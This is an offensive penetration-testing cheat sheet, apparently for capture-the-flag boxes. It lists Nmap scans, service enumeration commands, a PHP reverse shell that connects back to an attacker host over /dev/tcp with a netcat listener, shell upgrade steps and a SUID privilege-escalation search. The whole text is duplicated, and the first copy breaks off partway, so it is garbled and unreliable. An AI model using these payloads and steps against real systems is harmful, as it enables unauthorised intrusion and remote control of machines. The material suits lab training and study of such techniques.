1. Recon with Nmap
# Full TCP scan
sudo nmap -sC -sV -p- -Pn --min-rate=10000 <IP>

# Full UDP scan
sudo nmap -sU -p- -Pn --min-rate=10000 <IP>

# Targeted scan (replace ports)
sudo nmap -sC -sV -p XX,YY,ZZ <IP>

2. Choosing Attack Surface
From Nmap results, here’s what to check:

FTP (21) →
ftp <IP>
curl ftp://<IP>/ --user anonymous:


SMB (139/445) →
smbclient -L //<IP>/ -N
enum4linux <IP>


HTTP/HTTPS (80/443) →
gobuster dir -u http://<IP> -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
sslscan <IP>


Web Apps → Find version, search CVEs:
searchsploit <app_name>


Databases →
MySQL (3306): mysql -u root -h <IP> -p
MSSQL (1433): test default creds, xp_cmdshell.
Postgres (5432): psql -h <IP> -U postgres.

Remote Services →
RDP (3389): test weak creds, BlueKeep if old.
SSH (22/2222): creds from loot, keys.
Telnet (23): banner + defaults.
VNC (5900): try no password.

Email Services →
SMTP (25/465/587): nc <IP> 25, VRFY, EXPN.
IMAP/POP3 (143/110): try weak creds.

Other Services →
SNMP (161/162): snmpwalk -v2c -c public <IP>.
NFS (2049): showmount -e <IP>.
LDAP (389): ldapsearch -x -h <IP> -b "".
Redis (6379): redis-cli -h <IP>.
Elasticsearch (9200): curl <IP>:9200/_cat/indices.
Exotic Ports: always nc -nv <IP> <PORT>.

3. Web Shells & Upgrades
PHP Reverse Shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<KALI_IP>/<PORT> 0>&1'");
?>

Start listener on Kali:
nc -lvnp <PORT>

Upgrade Shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then:
1. Recon with Nmap
# Full TCP scan
sudo nmap -sC -sV -p- -Pn --min-rate=10000 <IP>

# Full UDP scan
sudo nmap -sU -p- -Pn --min-rate=10000 <IP>

# Targeted scan (replace ports)
sudo nmap -sC -sV -p XX,YY,ZZ <IP>

2. Choosing Attack Surface

From Nmap results, here’s what to check:

FTP (21) →

ftp <IP>
curl ftp://<IP>/ --user anonymous:


SMB (139/445) →

smbclient -L //<IP>/ -N
enum4linux <IP>


HTTP/HTTPS (80/443) →

gobuster dir -u http://<IP> -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
sslscan <IP>


Web Apps → Find version, search CVEs:

searchsploit <app_name>


Databases →

MySQL (3306): mysql -u root -h <IP> -p

MSSQL (1433): test default creds, xp_cmdshell.

Postgres (5432): psql -h <IP> -U postgres.

Remote Services →

RDP (3389): test weak creds, BlueKeep if old.

SSH (22/2222): creds from loot, keys.

Telnet (23): banner + defaults.

VNC (5900): try no password.

Email Services →

SMTP (25/465/587): nc <IP> 25, VRFY, EXPN.

IMAP/POP3 (143/110): try weak creds.

Other Services →

SNMP (161/162): snmpwalk -v2c -c public <IP>.

NFS (2049): showmount -e <IP>.

LDAP (389): ldapsearch -x -h <IP> -b "".

Redis (6379): redis-cli -h <IP>.

Elasticsearch (9200): curl <IP>:9200/_cat/indices.

Exotic Ports: always nc -nv <IP> <PORT>.

3. Web Shells & Upgrades
PHP Reverse Shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<KALI_IP>/<PORT> 0>&1'");
?>


Start listener on Kali:

nc -lvnp <PORT>

Upgrade Shell
python3 -c 'import pty; pty.spawn("/bin/bash")'


Then:

export TERM=xterm

4. Useful In-Shell Commands
Find flags
find / -name 'user.txt' 2>/dev/null
find / -name 'root.txt' 2>/dev/null

Check processes
ps aux | grep openvpn
sudo kill -9 <PID>

Find SUID binaries
find / -perm /4000 2>/dev/null

Privilege Escalation Research
Check SUIDs against GTFOBins

Recon → 2. Pick Attack Surface → 3. Initial Shell → 4. Stabilize/PrivEsc.

4. Useful In-Shell Commands
Find flags
find / -name 'user.txt' 2>/dev/null
find / -name 'root.txt' 2>/dev/null

Check processes
ps aux | grep openvpn
sudo kill -9 <PID>

Find SUID binaries
find / -perm /4000 2>/dev/null

Privilege Escalation Research
Check SUIDs against GTFOBins

Recon → 2. Pick Attack Surface → 3. Initial Shell → 4. Stabilize/PrivEsc.

